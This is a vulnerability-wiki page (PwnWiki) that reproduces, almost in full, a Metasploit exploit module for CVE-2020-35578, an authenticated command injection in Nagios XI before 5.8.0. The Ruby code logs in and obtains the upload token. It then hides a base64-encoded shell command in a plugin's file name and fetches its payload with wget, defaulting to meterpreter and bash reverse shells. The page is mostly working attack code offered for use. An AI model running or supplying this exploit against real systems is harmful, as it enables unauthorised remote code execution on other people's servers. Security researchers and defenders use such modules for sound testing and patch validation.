免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
INFO
This Metasploit module exploits a command injection vulnerability in the /admin/monitoringplugins.php page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated admin user to achieve remote code execution as the apache user by uploading a malicious plugin. Valid credentials for a Nagios XI admin user are required. This module has been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both running on CentOS 7.
EXP
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::NagiosXi include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection', 'Description' => %q{ This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php` page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin. Valid credentials for a Nagios XI admin user are required. This module has been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both running on CentOS 7. }, 'License' => MSF_LICENSE, 'Author' => 'Haboob Team', # https://haboob.sa - PoC 'Erik Wynter' # @wyntererik - Metasploit' , 'References' => 'CVE', '2020-35578', 'EDB', '49422' , 'Platform' => %wlinux unix, 'Arch' => ARCH_X86, ARCH_X64, ARCH_CMD, 'Targets' => 'Linux (x86/x64)', { 'Arch' => ARCH_X86, ARCH_X64, 'Platform' => 'linux', # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation 'CmdStagerFlavor' => :wget, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' } } , 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } , 'Privileged' => false, 'DisclosureDate' => '2020-12-19', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => CRASH_SAFE , 'SideEffects' => ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES , 'Reliability' => FIRST_ATTEMPT_FAIL # payload may not connect back the first time } ) ) register_options OptString.new('USERNAME', true, 'Username to authenticate with', 'nagiosadmin'), OptString.new('PASSWORD', true, 'Password to authenticate with', nil) end def username datastore'USERNAME' end def password datastore'PASSWORD' end def finish_install datastore'FINISH_INSTALL' end def check # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns # an array containing the http response body of a get request to index.php and the session cookies login_result, res_array = nagios_xi_login(username, password, finish_install) case login_result when 1..3 # An error occurred return CheckCode::Unknown(res_array0) when 4 # Nagios XI is not fully installed install_result = install_nagios_xi(password) if install_result return CheckCode::Unknown(install_result1) end login_result, res_array = login_after_install_or_license(username, password, finish_install) case login_result when 1..3 # An error occurred return CheckCode::Unknown(res_array0) when 4 # Nagios XI is still not fully installed return CheckCode::Detected('Failed to install Nagios XI on the target.') end end # when 5 is excluded from the case statement above to prevent having to use this code block twice. # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here. if login_result == 5 # the Nagios XI license agreement has not been signed auth_cookies, nsp = res_array sign_license_result = sign_license_agreement(auth_cookies, nsp) if sign_license_result return CheckCode::Unknown(sign_license_result1) end login_result, res_array = login_after_install_or_license(username, password, finish_install) case login_result when 1..3 return CheckCode::Unknown(res_array0) when 5 # the Nagios XI license agreement still has not been signed return CheckCode::Detected('Failed to sign the license agreement.') end end print_good('Successfully authenticated to Nagios XI') # Obtain the Nagios XI version @auth_cookies = res_array1 # if we are here, this cannot be nil since the mixin checks for that already nagios_version = nagios_xi_version(res_array0) if nagios_version.nil? return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard') end print_status("Target is Nagios XI with version #{nagios_version}") # check if the target is actually vulnerable if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\dA-Ha-h/.match(nagios_version) || nagios_version == '5R1.0' nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions. end @version = Rex::Version.new(nagios_version) if @version < Rex::Version.new('5.8.0') return CheckCode::Appears end return CheckCode::Safe end def execute_command(cmd, _opts = {}) # Convert the payload to hex ASCII and then Base64 encode the payload. # This is necessary for the exploit to work. payload_ascii = Rex::Text.to_hex_ascii(cmd) payload_base64 = Rex::Text.encode_base64(payload_ascii) payload = ";echo #{payload_base64} | base64 -d | bash;#" register_file_for_cleanup("/usr/local/nagios/libexec/#{payload}") # deleting the payload via the web interface doesn't seem possible # generate post data post_data = Rex::MIME::Message.new random_post_content = rand_text_alphanumeric(8..12) post_data.add_part('', nil, nil, 'form-data; name="upload"') post_data.add_part(@nsp, nil, nil, 'form-data; name="nsp"') post_data.add_part(random_post_content, 'text/plain', nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload}\"") post_data.add_part('1', nil, nil, 'form-data; name="convert_to_unix"') # upload payload send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'), 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => @auth_cookies, 'data' => post_data.to_s }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload end def exploit if @version < Rex::Version.new('5.3.0') fail_with(Failure::NoTarget, 'Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!') end # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'), 'cookie' => @auth_cookies }) unless res fail_with(Failure::Disconnected, "Connection failed while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`") end unless res.code == 200 && res.body.include?('<title>Manage Plugins · Nagios XI</title>') fail_with(Failure::UnexpectedReply, "Unexpected response received while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`") end # grab the nsp token, using the Nagios XI mixin @nsp = get_nsp(res) if @nsp.blank? fail_with(Failure::Unknown, 'Failed to obtain the nsp token required to upload the payload') end if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end end end
免费、自由、人人可编辑的漏洞库--PwnWiki.com